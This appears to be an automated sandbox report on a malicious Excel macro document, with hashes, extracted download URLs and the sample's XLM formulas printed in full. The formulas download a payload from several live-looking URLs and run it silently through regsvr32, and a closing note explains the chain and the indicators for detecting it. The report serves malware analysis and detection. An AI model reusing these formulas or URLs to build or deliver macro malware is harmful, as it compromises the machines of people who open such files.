Behavioral task
behavioral1
Sample
7ac32d506f20689756a895f8825945954af091335d6f8387b6b36808d3d1fc9c.xlsm
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
7ac32d506f20689756a895f8825945954af091335d6f8387b6b36808d3d1fc9c.xlsm
Resource
win10v2004-20241007-en
General
-
Target
7ac32d506f20689756a895f8825945954af091335d6f8387b6b36808d3d1fc9c
-
Size
90KB
-
MD5
b4cf8a517aa0695ee3ee1b49510bdd09
-
SHA1
ef326a415f65d08d2ac500330df76e55945764b5
-
SHA256
7ac32d506f20689756a895f8825945954af091335d6f8387b6b36808d3d1fc9c
-
SHA512
1e89664070d8b9a755505f5f049a91b4bc6eb36e8a0402b6b1834eb5fe0e8dcd4666aafbbab6d033aaaec22bd93cca2ab91867d65a5bf03fe008877ff43419af
-
SSDEEP
1536:jQBrnXpnyV+ns1BVi/IEh2hx0Lx3bKhllGGx0vKCEjdQjqEk+xXPd:KDpyVEoBo6hKb4llGsQjbxfd
Malware Config
Extracted
http://www.ajaxmatters.com/c7g8t/zbBYgukXYxzAF2hZc/
http://www.beholdpublications.com/home/BABxyyWZx8Vu/
http://explorationit.com/screwing/AxLm/
http://donboscoschoolputhuppally.org/wp-content/UuQ7LBsPoGu9Q/
http://myclassroomtime.com/mongery/ZlPsROtQiXIujmJmAA/
-
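formulas
=FORMULA()
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ajaxmatters.com/c7g8t/zbBYgukXYxzAF2hZc/","..\xxw1.ocx",0,0)
=IF('EGFAGAGDGE'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.beholdpublications.com/home/BABxyyWZx8Vu/","..\xxw1.ocx",0,0))
=IF('EGFAGAGDGE'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://explorationit.com/screwing/AxLm/","..\xxw1.ocx",0,0))
=IF('EGFAGAGDGE'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://donboscoschoolputhuppally.org/wp-content/UuQ7LBsPoGu9Q/","..\xxw1.ocx",0,0))
=IF('EGFAGAGDGE'!D21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://myclassroomtime.com/mongery/ZlPsROtQiXIujmJmAA/","..\xxw1.ocx",0,0))
=IF('EGFAGAGDGE'!D23<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx")
=RETURN()
Note: the entries above are Excel 4.0 (XLM) macro-sheet formulas, shown here one per line. Each CALL uses URLDownloadToFileA from urlmon to save the response as ..\xxw1.ocx. The IF tests on 'EGFAGAGDGE'!D15 through D23 appear to try the next URL only when the previous download returned a negative (failure) result, with CLOSE(0) reached when the last check also fails. The EXEC line then passes the downloaded file to regsvr32.exe from SysWow64 with /s (silent). For detection, the observable chain is Excel making outbound HTTP requests to the five extracted URLs, an .ocx file written one directory above the working directory, and the Excel process spawning regsvr32.exe /s on that file.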
Signatures
Files
-
7ac32d506f20689756a895f8825945954af091335d6f8387b6b36808d3d1fc9c.xlsm office2007